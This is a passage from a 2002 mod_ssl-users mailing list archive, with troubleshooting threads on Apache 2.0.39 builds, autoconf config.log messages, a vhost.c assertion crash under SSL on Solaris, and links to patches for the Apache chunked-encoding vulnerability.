running.  I fixed it by recompiling php (including a make clean) =
and restarting apache.



Keith Hunt  330.972.7968  =
keith@uakron.edu

Internet & Server Systems

The University of Akron 






> 

> When I use my phpinfo page, to see config info =
it shows that 

> apache is :

> Apache Version    Apache/1.3.23 =






------_=_NextPart_001_01C21C73.30D5A600--
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Tue Jun 25 20:39:12 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id UAA09004; Tue, 25 Jun 2002 20:37:50 +0200 (MET DST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via SMTP for 
	from COHNTFS24.ci.henderson.nv.us id UAA08901; Tue, 25 Jun 2002 20:36:22 +0200 (MET DST)
Received: from gty.ci.henderson.nv.us (gwia.ci.henderson.nv.us) by COHNTFS24.ci.henderson.nv.us
 (Content Technologies SMTPRS 4.2.10) with SMTP id  for ;
 Tue, 25 Jun 2002 11:36:51 -0700
Received: from HENMAIL2-Message_Server by gty.ci.henderson.nv.us
	with Novell_GroupWise; Tue, 25 Jun 2002 11:36:14 -0700
Message-Id: 
X-Mailer: Novell GroupWise Internet Agent 5.5.6.1
Date: Tue, 25 Jun 2002 11:36:09 -0700
From: "Jeff Landers" 
To: 
Subject: compiling apache2039
Mime-Version: 1.0
Content-Type: text/plain; charset="us-ascii"
Content-Disposition: inline
Content-Transfer-Encoding: 8bit
X-MIME-Autoconverted: from quoted-printable to 8bit by opensource.ee.ethz.ch id UAA08975
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "Jeff Landers" 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

Even with just a ./configure I have many parse and symbol errors in the config.log when I conifgure apache2039 although it exits with a zero. Is that OK or do I need to work with someone to resolve these errors. I submitted a bug report but it is probably way down the priority list. Are these errors normal?? Any one familiar with these errors? Also, why would the script exit with 0 if the subroutines are failing?? Educate me. Thanks

configure:3992: gcc -c  -g -O2 -pthreads  -DSOLARIS2=8 -D_POSIX_PTHREAD_SEMANTIC
S -D_REENTRANT conftest.c >&5
conftest.c:2: parse error before `me'
configure:3995: $? = 1
configure: failed program was:
#ifndef __cplusplus
  choke me   


configure:5549: gcc -o conftest  -g -O2 -pthreads  -DSOLARIS2=8 -D_POSIX_PTHREAD
_SEMANTICS -D_REENTRANT   -L/tmp/httpd-2.0.39/srclib/apr-util/xml/expat/lib conf
test.c  >&5
Undefined                       first referenced
 symbol                             in file
bindprocessor                       /var/tmp/ccNLkua3.o
ld: fatal: Symbol referencing errors. No output written to conftest
collect2: ld returned 1 exit status
configure:5552: $? = 1
configure: failed program was:
#line 5511 "configure"  

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Tue Jun 25 20:43:54 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id UAA09559; Tue, 25 Jun 2002 20:43:02 +0200 (MET DST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from falcon.mail.pas.earthlink.net id UAA09396; Tue, 25 Jun 2002 20:41:36 +0200 (MET DST)
Received: from kermit.mail.pas.earthlink.net ([207.217.120.241] helo=kermit.psp.pas.earthlink.net)
	by falcon.mail.pas.earthlink.net with esmtp (Exim 3.33 #2)
	id 17MvFp-0001T5-00
	for modssl-users@modssl.org; Tue, 25 Jun 2002 11:41:29 -0700
Received: (from nobody@localhost)
	by kermit.psp.pas.earthlink.net (8.10.2+Sun/8.10.2) id g5PIfSA26285
	for modssl-users@modssl.org; Tue, 25 Jun 2002 11:41:28 -0700 (PDT)
Date: Tue, 25 Jun 2002 11:41:28 -0700
From: RON MCKEEVER
To: modssl-users@modssl.org
Subject: RE: Upgrade ?
Message-ID: 
X-Originating-IP: 134.9.11.140
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: RON MCKEEVER
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

Thanks Keith and Henning....

It makes sense to recompile PHP. I just wish it was as simple as editing a
file. Oh well....

Thanks again
Ron

On Tue, 25 Jun 2002 14:07:38 -0400 Henning Sittler 
wrote:






RE: Upgrade ?




Recompiling PHP is really the only accurate solution to that one line from
phpinfo():



Apache Version    Apache/1.3.23 



is from the last (clean?) compile of PHP, and does not reflect any chages or
updates made to Apache since then.  However, the SERVER_SIGNATURE env var
shown in phpinfo() is up to date and accurate, because it's directly from the
current Apache.


Henning Sittler
www.inscriber.com





-----Original Message-----
From: Hunt,Keith A [mailto:keith@uakron.edu]
Sent: Tuesday, June 25, 2002 1:56 PM
To: modssl-users@modssl.org
Subject: RE: Upgrade ?




Ron, 



I have had that same issue when I have upgraded apache.  I never noticed that
it caused a problem, but it certainly bothered me that php did not know which
version of apache was running.  I fixed it by recompiling php (including a
make clean) and restarting apache.


Keith Hunt  330.972.7968  keith@uakron.edu
Internet & Server Systems
The University of Akron 




> 
> When I use my phpinfo page, to see config info it shows that 
> apache is :
> Apache Version    Apache/1.3.23 




______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Tue Jun 25 20:49:33 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id UAA10170; Tue, 25 Jun 2002 20:47:51 +0200 (MET DST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from deepthought.cs.virginia.edu id UAA09935; Tue, 25 Jun 2002 20:45:38 +0200 (MET DST)
Received: from localhost (root@localhost)
	by deepthought.cs.virginia.edu (8.11.6/8.11.4) with ESMTP id g5PIfM316533
	for ; Tue, 25 Jun 2002 14:41:22 -0400
Date: Tue, 25 Jun 2002 14:41:22 -0400 (EDT)
From: Cliff Woolley 
X-X-Sender: root@deepthought.cs.virginia.edu
To: modssl-users@modssl.org
Subject: Re: compiling apache2039
In-Reply-To: 
Message-ID: 
MIME-Version: 1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Cliff Woolley 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

On Tue, 25 Jun 2002, Jeff Landers wrote:

> Even with just a ./configure I have many parse and symbol errors in the
> config.log when I conifgure apache2039 although it exits with a zero. Is
> that OK or do I need to work with someone to resolve these errors.

That's totally normal.  These "errors" are how autoconf determines which
features your compiler, linker, and system headers/libraries support.  If
it compiles and links, that's a "yes, the feature is available."  If it
fails to compile and link that's just a "no, the feature is not
available."  But a particular feature not being available is not usually
fatal.  The messages configure prints on stdout would tell you if it was a
fatal condition.

In other words: ignore config.log unless you encounter a fatal condition
and need to find out exactly what happened.

--Cliff

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Tue Jun 25 21:00:21 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id UAA10582; Tue, 25 Jun 2002 20:51:51 +0200 (MET DST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from mail.inorth.com id UAA10416; Tue, 25 Jun 2002 20:50:32 +0200 (MET DST)
Received: by mail.inorth.com with Internet Mail Service (5.5.2653.19)
	id ; Tue, 25 Jun 2002 14:49:43 -0400
Message-ID: 
From: Henning Sittler 
To: "'modssl-users@modssl.org'" 
Subject: RE: Upgrade ?
Date: Tue, 25 Jun 2002 14:50:27 -0400
MIME-Version: 1.0
X-Mailer: Internet Mail Service (5.5.2653.19)
Content-Type: multipart/alternative;
	boundary="----_=_NextPart_001_01C21C79.2BFDF780"
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Henning Sittler 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

This message is in MIME format. Since your mail reader does not understand
this format, some or all of this message may not be legible.

------_=_NextPart_001_01C21C79.2BFDF780
Content-Type: text/plain;
	charset="iso-8859-1"

Not to keep on going about PHP on this list, but I think there is a text
file kept by php which contains the value of that line about Apache, and the
php compile info.  Which also means that technically you can simply edit
that text file to change a *displayed* value for the compile info shown in
phpinfo(), you'd just have to find that file first.


Henning Sittler
www.inscriber.com



-----Original Message-----
From: RON MCKEEVER [mailto:rmckeever@earthlink.net]
Sent: Tuesday, June 25, 2002 2:41 PM
To: modssl-users@modssl.org
Subject: RE: Upgrade ?


Thanks Keith and Henning....

It makes sense to recompile PHP. I just wish it was as simple as editing a
file. Oh well....

Thanks again
Ron

------_=_NextPart_001_01C21C79.2BFDF780
Content-Type: text/html;
	charset="iso-8859-1"
Content-Transfer-Encoding: quoted-printable






RE: Upgrade ?




Not to keep on going about PHP on this list, but I =
think there is a text file kept by php which contains the value of that =
line about Apache, and the php compile info.  Which also means =
that technically you can simply edit that text file to change a =
*displayed* value for the compile info shown in phpinfo(), you'd just =
have to find that file first.





Henning Sittler

www.inscriber.com








-----Original Message-----

From: RON MCKEEVER [mailto:rmckeever@earthlink.net]

Sent: Tuesday, June 25, 2002 2:41 PM

To: modssl-users@modssl.org

Subject: RE: Upgrade ?






Thanks Keith and Henning....




It makes sense to recompile PHP. I just wish it was =
as simple as editing a

file. Oh well....




Thanks again

Ron





------_=_NextPart_001_01C21C79.2BFDF780--
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Wed Jun 26 00:19:27 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id AAA28471; Wed, 26 Jun 2002 00:19:02 +0200 (MET DST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via SMTP for 
	from COHNTFS24.ci.henderson.nv.us id AAA28287; Wed, 26 Jun 2002 00:17:51 +0200 (MET DST)
Received: from gty.ci.henderson.nv.us (gwia.ci.henderson.nv.us) by COHNTFS24.ci.henderson.nv.us
 (Content Technologies SMTPRS 4.2.10) with SMTP id  for ;
 Tue, 25 Jun 2002 15:18:16 -0700
Received: from HENMAIL2-Message_Server by gty.ci.henderson.nv.us
	with Novell_GroupWise; Tue, 25 Jun 2002 15:17:41 -0700
Message-Id: 
X-Mailer: Novell GroupWise Internet Agent 5.5.6.1
Date: Tue, 25 Jun 2002 15:17:26 -0700
From: "Jeff Landers" 
To: 
Subject: Re: compiling apache2039
Mime-Version: 1.0
Content-Type: text/plain; charset="us-ascii"
Content-Disposition: inline
Content-Transfer-Encoding: 8bit
X-MIME-Autoconverted: from quoted-printable to 8bit by opensource.ee.ethz.ch id AAA28416
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "Jeff Landers" 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

Does this mean that I should ignore the "fatal" errors in the config.log because it exits with code 0 or is this a problem? Sorry for my ignorance but the old stuff configures and compiles fine but I can't get version 2 to do anything but error out. This is one example. Thank you for your support.

configure:5549: gcc -o conftest  -g -O2 -pthreads  -DSOLARIS2=8 -D_POSIX_PTHREAD
_SEMANTICS -D_REENTRANT   -L/tmp/httpd-2.0.39/srclib/apr-util/xml/expat/lib conf
test.c  >&5
Undefined                       first referenced
 symbol                             in file
bindprocessor                       /var/tmp/ccNLkua3.o
ld: fatal: Symbol referencing errors. No output written to conftest
collect2: ld returned 1 exit status
configure:5552: $? = 1
configure: failed program was:
#line 5511 "configure"  






>>> jwoolley@apache.org 06/25/02 11:41AM >>>
On Tue, 25 Jun 2002, Jeff Landers wrote:

> Even with just a ./configure I have many parse and symbol errors in the
> config.log when I conifgure apache2039 although it exits with a zero. Is
> that OK or do I need to work with someone to resolve these errors.

That's totally normal.  These "errors" are how autoconf determines which
features your compiler, linker, and system headers/libraries support.  If
it compiles and links, that's a "yes, the feature is available."  If it
fails to compile and link that's just a "no, the feature is not
available."  But a particular feature not being available is not usually
fatal.  The messages configure prints on stdout would tell you if it was a
fatal condition.

In other words: ignore config.log unless you encounter a fatal condition
and need to find out exactly what happened.

--Cliff

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org 
User Support Mailing List                      modssl-users@modssl.org 
Automated List Manager                            majordomo@modssl.org

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Wed Jun 26 00:29:17 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id AAA29519; Wed, 26 Jun 2002 00:28:52 +0200 (MET DST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from deepthought.cs.virginia.edu id AAA29360; Wed, 26 Jun 2002 00:27:36 +0200 (MET DST)
Received: from localhost (root@localhost)
	by deepthought.cs.virginia.edu (8.11.6/8.11.4) with ESMTP id g5PMNKg23858
	for ; Tue, 25 Jun 2002 18:23:20 -0400
Date: Tue, 25 Jun 2002 18:23:20 -0400 (EDT)
From: Cliff Woolley 
X-X-Sender: root@deepthought.cs.virginia.edu
To: modssl-users@modssl.org
Subject: Re: compiling apache2039
In-Reply-To: 
Message-ID: 
MIME-Version: 1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Cliff Woolley 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

On Tue, 25 Jun 2002, Jeff Landers wrote:

> Does this mean that I should ignore the "fatal" errors in the config.log

Yes.  Like I said, don't even look at config.log unless configure itself
tells you something fatal happened.  And even if that happens, most of the
"fatal" things in config.log are not what caused configure to report a
fatal error.  "fatal" things in config.log just mean that a certain
feature is not available, not that a REAL fatal error occurred.

--Cliff

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Wed Jun 26 01:13:45 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id BAA03680; Wed, 26 Jun 2002 01:12:33 +0200 (MET DST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP
	from ginsberg.uol.com.br id BAA03666; Wed, 26 Jun 2002 01:12:01 +0200 (MET DST)
Received: from denao ([192.168.209.103])
	by ginsberg.uol.com.br (8.9.1/8.9.1) with ESMTP id UAA02889;
	Tue, 25 Jun 2002 20:10:31 -0300 (BRT)
Subject: Re: [BugDB] Performance issue (PR#723)
From: "Denis A.V.Jr." 
To: modssl-users@modssl.org
Cc: modssl-bugdb@modssl.org
In-Reply-To: <20020624105228.A2158792@ohm.arago.de>
References: <200206212349.BAA00234@opensource.ee.ethz.ch> 
	<20020624105228.A2158792@ohm.arago.de>
Content-Type: text/plain
Content-Transfer-Encoding: 7bit
X-Mailer: Evolution/0.15 (Preview Release)
Date: 25 Jun 2002 20:08:20 -0300
Message-Id: <1025046502.12654.34.camel@theblues>
Mime-Version: 1.0
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "Denis A.V.Jr." 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

Hi Thomas,

I'll try that and send the results to the list.

thank you

On Mon, 2002-06-24 at 05:52, Thomas Binder wrote:
> Hi!
> 
> On Sat, Jun 22, 2002 at 01:49:12AM +0200, modssl-bugdb@modssl.org wrote:
> > This caused a different behavior. I mean, it took a little while
> > (~3 minutes), to the loadav get high, and after a few minutes,
> > it got worse... the loadav reached ~60... Without the
> > "no-threads no-idea -fPIC" options at the openSSL compilation,
> > the high loadav is instantaneous.
> > 
> > I can bring any information you need to debug this problem. Just
> > let me know what do you need.
> 
> What kind of random seed do you use? As far as I know, IRIX has no
> /dev/random (nor /dev/urandom), so I might be a good idea to
> install prngd and let SSLRandomSeed point to its socket (using
> egd:/path/to/socket)
> 
> This might already solve your problem.
> 
> 
> Ciao
> 
> Thomas
> ______________________________________________________________________
> Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
> User Support Mailing List                      modssl-users@modssl.org
> Automated List Manager                            majordomo@modssl.org
> 
-- 
Denis A.V.Jr. - denao@uol.com.br
Systems Engineer - ICQ 2524962
Universo Online

perl -e 'print "computers are like air-conditioners: they stop working
when you open windows ", pack("c*",hex
"3A",sqrt(2025),(unpack(c,"=")-20),10);'


______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Wed Jun 26 01:17:07 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id BAA04182; Wed, 26 Jun 2002 01:16:39 +0200 (MET DST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via SMTP for 
	from COHNTFS24.ci.henderson.nv.us id BAA04104; Wed, 26 Jun 2002 01:15:58 +0200 (MET DST)
Received: from gty.ci.henderson.nv.us (gwia.ci.henderson.nv.us) by COHNTFS24.ci.henderson.nv.us
 (Content Technologies SMTPRS 4.2.10) with SMTP id  for ;
 Tue, 25 Jun 2002 16:16:27 -0700
Received: from HENMAIL2-Message_Server by gty.ci.henderson.nv.us
	with Novell_GroupWise; Tue, 25 Jun 2002 16:15:51 -0700
Message-Id: 
X-Mailer: Novell GroupWise Internet Agent 5.5.6.1
Date: Tue, 25 Jun 2002 16:15:40 -0700
From: "Jeff Landers" 
To: 
Subject: Apache, ssl, and solaris
Mime-Version: 1.0
Content-Type: text/plain; charset="us-ascii"
Content-Disposition: inline
Content-Transfer-Encoding: 8bit
X-MIME-Autoconverted: from quoted-printable to 8bit by opensource.ee.ethz.ch id BAA04107
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "Jeff Landers" 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

There are at least two of us battling this problem with the same errors. Dave is attempting apache2039 with ssl on Solaris 9 and I am trying it on Solaris 8 with the exact same errors. This is his message from earlier today which is the same as my errors. I have reinstalled openssl 096d and used the apache ./configure with the same options as he with the same results. Mr. Wooley indicated that my virtual hosts were using the default settings which was causing a call to vhost.c. However, the entire Section 3 of httpd.conf is commented out. What are we doing wrong? Thank you for putting up with this flurry of emails.

Compiled and installed openssl-0.9.6d

Compiled and installed Apache 2.0.39 ( ./configure 
--prefix=/usr/local/apache --enable-ssl --with-ssl=/usr/local/ssl 
--enable-rewrite )

Added custom cert

Tried starting Apache without SSL, works but get an SSLSessionCache warning:
# /usr/local/apache/bin/apachectl start
# more error_log
[Tue Jun 25 16:22:17 2002] [warn] Init: Session Cache is not configured 
[hint: SSLSessionCache]
[Tue Jun 25 16:22:19 2002] [notice] Apache/2.0.39 (Unix) mod_ssl/2.0.39 
OpenSSL/0.9.6d configured -- resuming normal operations

Tried starting Apache with SSL, crashes
# /usr/local/apache/bin/apachectl startssl
[Tue Jun 25 16:21:32 2002] [crit] [Tue Jun 25 16:21:32 2002] file 
vhost.c, line 232, assertion "rv == APR_SUCCESS" failed
Abort - core dumped


Any ideas

Thanks


______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Wed Jun 26 01:25:16 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id BAA05147; Wed, 26 Jun 2002 01:24:33 +0200 (MET DST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from exchange00.SC.ESILICON.COM id BAA05040; Wed, 26 Jun 2002 01:23:30 +0200 (MET DST)
Received: by exchange00.SC.ESILICON.COM with Internet Mail Service (5.5.2653.19)
	id ; Tue, 25 Jun 2002 16:23:23 -0700
Message-ID: <691874941F1F954198F7E7FCBAEF1FAE0D2056@exchange00.SC.ESILICON.COM>
From: David Marshall 
To: "'modssl-users@modssl.org'" 
Subject: Apache Chunking Exploit
Date: Tue, 25 Jun 2002 16:23:23 -0700
MIME-Version: 1.0
X-Mailer: Internet Mail Service (5.5.2653.19)
Content-Type: text/plain;
	charset="iso-8859-1"
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: David Marshall 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

For those of you working to patch your production Apache installations. 

I have tested and verified Cris Bailiff's interim fix. (see
http://online.securityfocus.com/archive/1/278281/2002-06-21/2002-06-27/0).  

Now I am re-building and testing my Apache/mod-ssl systems and all of my 3rd
party vendor modules. My plan is to replace the interim fix with the real
one, but I had too many combinations of Apache/mod_ssl and 3rd party modules
to do so, quickly. 

For me, Cris Bailiff's patch was just in-time.

David Marshall
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Wed Jun 26 02:00:14 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id BAA08548; Wed, 26 Jun 2002 01:59:41 +0200 (MET DST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from deepthought.cs.virginia.edu id BAA08438; Wed, 26 Jun 2002 01:59:02 +0200 (MET DST)
Received: from localhost (root@localhost)
	by deepthought.cs.virginia.edu (8.11.6/8.11.4) with ESMTP id g5PNsjX26772
	for ; Tue, 25 Jun 2002 19:54:45 -0400
Date: Tue, 25 Jun 2002 19:54:45 -0400 (EDT)
From: Cliff Woolley 
X-X-Sender: root@deepthought.cs.virginia.edu
To: "'modssl-users@modssl.org'" 
Subject: Re: Apache Chunking Exploit
In-Reply-To: <691874941F1F954198F7E7FCBAEF1FAE0D2056@exchange00.SC.ESILICON.COM>
Message-ID: 
MIME-Version: 1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Cliff Woolley 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

On Tue, 25 Jun 2002, David Marshall wrote:

> For those of you working to patch your production Apache installations.
> I have tested and verified Cris Bailiff's interim fix. (see
> http://online.securityfocus.com/archive/1/278281/2002-06-21/2002-06-27/0).

That's way overkill.  Please see

http://www.apache.org/dist/httpd/patches/apply_to_1.3.22/SECURITY_chunk_size_patch.txt

for a patch that should fix all versions of Apache up to 1.3.22 (you may
or may not have to apply it to earlier versions by hand, but the logic
should suffice).  For versions 1.3.23-1.3.25, the best fix is to upgrade
to 1.3.26 because the proxy was vulnerable in those versions as well as
the core.

Note: this patch is only a bandaid -- you should still upgrade ASAP.

--Cliff

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Wed Jun 26 02:10:40 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id CAA09516; Wed, 26 Jun 2002 02:09:43 +0200 (MET DST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from deepthought.cs.virginia.edu id CAA09382; Wed, 26 Jun 2002 02:08:24 +0200 (MET DST)
Received: from localhost (root@localhost)
	by deepthought.cs.virginia.edu (8.11.6/8.11.4) with ESMTP id g5Q047e27078
	for ; Tue, 25 Jun 2002 20:04:07 -0400
Date: Tue, 25 Jun 2002 20:04:07 -0400 (EDT)
From: Cliff Woolley 
X-X-Sender: root@deepthought.cs.virginia.edu
To: modssl-users@modssl.org
Subject: Re: Apache, ssl, and solaris
In-Reply-To: 
Message-ID: 
MIME-Version: 1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Cliff Woolley 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

On Tue, 25 Jun 2002, Jeff Landers wrote:

> Tried starting Apache with SSL, crashes
> # /usr/local/apache/bin/apachectl startssl
> [Tue Jun 25 16:21:32 2002] [crit] [Tue Jun 25 16:21:32 2002] file
> vhost.c, line 232, assertion "rv == APR_SUCCESS" failed
> Abort - core dumped

>From vhost.c:

    if (strcmp(host, "*") == 0) {
        rv = apr_sockaddr_info_get(&my_addr, "0.0.0.0", APR_INET, port,
                                   0, p);
        ap_assert(rv == APR_SUCCESS); /* must be bug or out of storage */
    }
    else if (strcasecmp(host, "_default_") == 0
        || strcmp(host, "255.255.255.255") == 0) {
        rv = apr_sockaddr_info_get(&my_addr, "255.255.255.255", APR_INET,
                                    port, 0, p);
-->     ap_assert(rv == APR_SUCCESS); /* must be bug or out of storage */
    }
    else { ...


Your assert popped on the line that I prefixed with "-->".  Try changing
your vhosts to not use "_default_".  I forget exactly which configuration
combination causes that error, but it's definitely been seen before.

--Cliff

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Wed Jun 26 03:17:09 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id DAA15921; Wed, 26 Jun 2002 03:16:29 +0200 (MET DST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from darkstar.sysinfo.com id DAA15787; Wed, 26 Jun 2002 03:15:11 +0200 (MET DST)
Received: from localhost (dufresne@localhost)
	by darkstar.sysinfo.com (8.9.1/8.9.1) with ESMTP id VAA25322
	for ; Tue, 25 Jun 2002 21:16:05 -0400
Date: Tue, 25 Jun 2002 21:16:05 -0400 (EDT)
From: "R. DuFresne" 
To: modssl-users@modssl.org
Subject: Re: Apache, ssl, and solaris
In-Reply-To: 
Message-ID: 
Organization: sysinfo.com
X-Subliminal: If at first you don't suck seed...
X-Admonition: The Good thing about potential is
X-Admonition2: as long as you do nothing
X-Admonition3: you'll always have it.
MIME-Version: 1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "R. DuFresne" 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users


What are the settings you have for this param in your httpd.conf?  That is
the hint to resolution the warning is giving.

Thanks,

Ron DuFresne

On Tue, 25 Jun 2002, Jeff Landers wrote:

> There are at least two of us battling this problem with the same errors. Dave is attempting apache2039 with ssl on Solaris 9 and I am trying it on Solaris 8 with the exact same errors. This is his message from earlier today which is the same as my errors. I have reinstalled openssl 096d and used the apache ./configure with the same options as he with the same results. Mr. Wooley indicated that my virtual hosts were using the default settings which was causing a call to vhost.c. However, the entire Section 3 of httpd.conf is commented out. What are we doing wrong? Thank you for putting up with this flurry of emails.
> 
> Compiled and installed openssl-0.9.6d
> 
> Compiled and installed Apache 2.0.39 ( ./configure 
> --prefix=/usr/local/apache --enable-ssl --with-ssl=/usr/local/ssl 
> --enable-rewrite )
> 
> Added custom cert
> 
> Tried starting Apache without SSL, works but get an SSLSessionCache warning:
> # /usr/local/apache/bin/apachectl start
> # more error_log
> [Tue Jun 25 16:22:17 2002] [warn] Init: Session Cache is not configured 
> [hint: SSLSessionCache]
> [Tue Jun 25 16:22:19 2002] [notice] Apache/2.0.39 (Unix) mod_ssl/2.0.39 
> OpenSSL/0.9.6d configured -- resuming normal operations
> 
> Tried starting Apache with SSL, crashes
> # /usr/local/apache/bin/apachectl startssl
> [Tue Jun 25 16:21:32 2002] [crit] [Tue Jun 25 16:21:32 2002] file 
> vhost.c, line 232, assertion "rv == APR_SUCCESS" failed
> Abort - core dumped
> 
> 
> Any ideas
> 
> Thanks
> 
> 
> ______________________________________________________________________
> Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
> User Support Mailing List                      modssl-users@modssl.org
> Automated List Manager                            majordomo@modssl.org
> 

-- 
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
        admin & senior security consultant:  sysinfo.com
                        http://sysinfo.com

"Cutting the space budget really restores my faith in humanity.  It
eliminates dreams, goals, and ideals and lets us get straight to the
business of hate, debauchery, and self-annihilation."
                -- Johnny Hart

testing, only testing, and damn good at it too!

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Wed Jun 26 04:40:05 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id EAA24261; Wed, 26 Jun 2002 04:39:31 +0200 (MET DST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from pluto.trimble.co.nz id EAA24217; Wed, 26 Jun 2002 04:38:55 +0200 (MET DST)
Received: (qmail 32108 invoked from network); 26 Jun 2002 14:38:51 +1200
Received: from thoth.trimble.co.nz (155.63.248.21)
  by pluto.trimble.co.nz with DES-CBC3-SHA encrypted SMTP; 26 Jun 2002 14:38:51 +1200
Received: (qmail 12737 invoked by uid 403); 26 Jun 2002 14:38:51 +1200
